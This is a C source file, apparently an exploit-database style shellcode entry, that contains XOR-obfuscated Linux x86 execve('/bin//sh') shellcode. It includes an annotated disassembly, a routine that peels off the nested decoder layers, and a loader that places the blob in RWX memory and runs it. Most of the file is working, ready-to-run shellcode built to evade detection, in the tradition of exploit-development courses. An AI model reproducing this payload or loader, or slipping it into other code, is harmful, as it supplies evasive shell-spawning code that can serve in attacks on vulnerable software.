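/*
 * Obfuscated execve("/bin//sh") shellcode, Linux x86 (32-bit, int 0x80).
 *
 * Greetz    : Bomberman & T-Rex
 * Author    : B3mB4m
 * Tested on : Ubuntu 14.04
 * (Working on SLAE & SPSE <3)
 *
 * Layout of the 67-byte blob:
 *   [0..22]  23-byte decoder stub: jmp/call/pop puts the EIP-relative address
 *            of the payload in %esi, then `xorb $0xaa; xorb $0xfa` is applied
 *            to %cl = 0x2c (44) bytes.  Two XORs with constant keys are one
 *            XOR with 0xaa ^ 0xfa = 0x50, so the obfuscation is a single-byte
 *            XOR key, and the stub bytes themselves are a well-known pattern
 *            (eb 10 5e 31 c9 b1 .. 80 36 .. 80 36 .. 46 e2 f7 eb 05 e8 ...).
 *   [23..66] 44 encoded bytes.  Peeling that layer offline (see deobfuscate()
 *            below) yields a second stub of the same shape (%cl = 0x15,
 *            keys 0xaa/0xff = 0x55) wrapping the classic 21-byte
 *            execve("/bin//sh") payload:
 *            31 c0 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 89 c2 b0 0b cd 80
 * The blob contains no 0x00 byte, so strlen() happens to report the full
 * length; the loader uses sizeof so that it does not depend on that.
 *
 * The stubs write into the bytes that follow them (xorb (%esi)), so the
 * memory the blob runs from must be writable AND executable.  The original
 * loader jumped into a plain .data array, which only works without NX
 * (old toolchains / -z execstack); here the bytes are copied into a region
 * that is explicitly made RWX.  Build as 32-bit:  cc -m32 -o shell shell.c
 *
 * objdump -d of the blob (section .text):
 *  08048060 <.text>:
 *   8048060: eb 10                  jmp    0x8048072
 *   8048062: 5e                     pop    %esi
 *   8048063: 31 c9                  xor    %ecx,%ecx
 *   8048065: b1 2c                  mov    $0x2c,%cl
 *   8048067: 80 36 aa               xorb   $0xaa,(%esi)
 *   804806a: 80 36 fa               xorb   $0xfa,(%esi)
 *   804806d: 46                     inc    %esi
 *   804806e: e2 f7                  loop   0x8048067
 *   8048070: eb 05                  jmp    0x8048077
 *   8048072: e8 eb ff ff ff         call   0x8048062
 *   ---- everything from 0x8048077 on is XOR-encoded payload, not code;
 *        objdump's decoding of it below is meaningless until the stub ran ----
 *   8048077: bb 40 0e 61 99         mov    $0x99610e40,%ebx
 *   804807c: e1 45                  loope  0x80480c3
 *   804807e: d0 66 fa               shlb   -0x6(%esi)
 *   8048081: d0 66 af               shlb   -0x51(%esi)
 *   8048084: 16                     push   %ss
 *   8048085: b2 a7                  mov    $0xa7,%dl
 *   8048087: bb 55 b8 bb af         mov    $0xafbbb855,%ebx
 *   804808c: af                     scas   %es:(%edi),%eax
 *   804808d: af                     scas   %es:(%edi),%eax
 *   804808e: 34 c5                  xor    $0xc5,%al
 *   8048090: 55                     push   %ebp
 *   8048091: 6d                     insl   (%dx),%es:(%edi)
 *   8048092: 2a 2a                  sub    (%edx),%ch
 *   8048094: 76 6d                  jbe    0x8048103
 *   8048096: 6d                     insl   (%dx),%es:(%edi)
 *   8048097: 2a 67 6c               sub    0x6c(%edi),%ah
 *   804809a: 6b 8c e6 8c c7 b5 0e   imul   $0xffffffc8,0xeb5c78c(%esi,%eiz,8),%ecx
 *   80480a1: c8
 *   80480a2: 85                     .byte  0x85
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Raw blob: 23-byte decoder stub + 44 encoded bytes (name kept as in the original, sic). */
unsigned char obfucusted[] =
    "\xeb\x10\x5e\x31\xc9\xb1\x2c\x80\x36\xaa\x80\x36\xfa\x46\xe2\xf7"
    "\xeb\x05\xe8\xeb\xff\xff\xff"
    "\xbb\x40\x0e\x61\x99\xe1\x45\xd0\x66\xfa\xd0\x66\xaf\x16\xb2\xa7"
    "\xbb\x55\xb8\xbb\xaf\xaf\xaf\x34\xc5\x55\x6d\x2a\x2a\x76\x6d\x6d"
    "\x2a\x67\x6c\x6b\x8c\xe6\x8c\xc7\xb5\x0e\xc8\x85";

/* Decoder stub geometry, taken from the disassembly above. */
enum {
    STUB_LEN     = 23,  /* jmp .. call back to the pop, inclusive            */
    STUB_OFF_LEN = 6,   /* immediate of `mov $N,%cl`: payload byte count     */
    STUB_OFF_K1  = 9,   /* immediate of the first `xorb $K,(%esi)`           */
    STUB_OFF_K2  = 12   /* immediate of the second `xorb $K,(%esi)`          */
};

/*
 * Return nonzero if the first STUB_LEN bytes of p (len bytes available) are
 * the jmp/call/pop + xorb/xorb/loop decoder stub; the three immediates
 * (count, key1, key2) are wildcards.
 */
static int is_decoder_stub(const unsigned char *p, size_t len)
{
    static const unsigned char tmpl[STUB_LEN] = {
        0xeb, 0x10, 0x5e, 0x31, 0xc9, 0xb1, 0x00, 0x80, 0x36, 0x00, 0x80, 0x36,
        0x00, 0x46, 0xe2, 0xf7, 0xeb, 0x05, 0xe8, 0xeb, 0xff, 0xff, 0xff
    };
    if (p == NULL || len < STUB_LEN) {
        return 0;
    }
    for (size_t i = 0; i < STUB_LEN; i++) {
        if (i == STUB_OFF_LEN || i == STUB_OFF_K1 || i == STUB_OFF_K2) {
            continue;
        }
        if (p[i] != tmpl[i]) {
            return 0;
        }
    }
    return 1;
}

/*
 * Emulate one decoder stub in place, without executing anything: XOR the
 * %cl bytes that follow the stub with key1 then key2, exactly as the stub
 * does.  On success store STUB_LEN in *payload_off and return the payload
 * length.  Return 0 (buffer untouched) when buf does not start with a stub,
 * the count is 0 (the real `loop` would run 2^32 times), or the declared
 * payload would run past len.
 */
static size_t peel_layer(unsigned char *buf, size_t len, size_t *payload_off)
{
    if (!is_decoder_stub(buf, len)) {
        return 0;
    }
    size_t n = buf[STUB_OFF_LEN];
    if (n == 0 || n > len - STUB_LEN) {
        return 0;
    }
    unsigned char k1 = buf[STUB_OFF_K1];
    unsigned char k2 = buf[STUB_OFF_K2];
    for (size_t i = 0; i < n; i++) {
        buf[STUB_LEN + i] ^= k1;
        buf[STUB_LEN + i] ^= k2;
    }
    *payload_off = STUB_LEN;
    return n;
}

/*
 * Peel every nested decoder layer from buf (len bytes) in place, stopping at
 * the first region that does not start with a stub.  Store the offset of the
 * innermost payload in *off and return its length.  A buffer with no stub is
 * returned unchanged with *off == 0 and length len.  Useful for analysis and
 * for checking the blob before handing it to the CPU.
 */
static size_t deobfuscate(unsigned char *buf, size_t len, size_t *off)
{
    size_t cur = 0;
    size_t cur_len = len;
    size_t step = 0;
    size_t n;

    while ((n = peel_layer(buf + cur, cur_len, &step)) != 0) {
        cur += step;
        cur_len = n;
    }
    *off = cur;
    return cur_len;
}

/*
 * Print the blob length and run it from a page-aligned RWX region.
 * Returns 1 on any failure; on success execve() replaces the process and
 * this function never returns.
 */
int main(void)
{
    const size_t len = sizeof obfucusted - 1;   /* drop the string terminator */
    printf("Shellcode Length: %zu\n", len);

#ifndef __i386__
    /* 32-bit pushes and int 0x80: the blob is only meaningful in a 32-bit process. */
    fputs("this shellcode is x86-32 only; rebuild with -m32\n", stderr);
    return 1;
#endif

    /* Whole pages, so the protection change covers exactly what we own. */
    long ps = sysconf(_SC_PAGESIZE);
    if (ps <= 0) {
        perror("sysconf");
        return 1;
    }
    size_t page = (size_t)ps;
    size_t size = (len + page - 1) / page * page;

    unsigned char *mem = aligned_alloc(page, size);
    if (mem == NULL) {
        perror("aligned_alloc");
        return 1;
    }
    memcpy(mem, obfucusted, len);

    /* RWX, not RX: the decoder stubs rewrite the payload in place before jumping to it. */
    if (mprotect(mem, size, PROT_READ | PROT_WRITE | PROT_EXEC) != 0) {
        perror("mprotect");     /* usually a W^X / SELinux execmem policy */
        free(mem);
        return 1;
    }

    int (*ret)(void) = (int (*)(void))mem;
    ret();                      /* no return on success: execve replaces the image */

    free(mem);
    return 0;
}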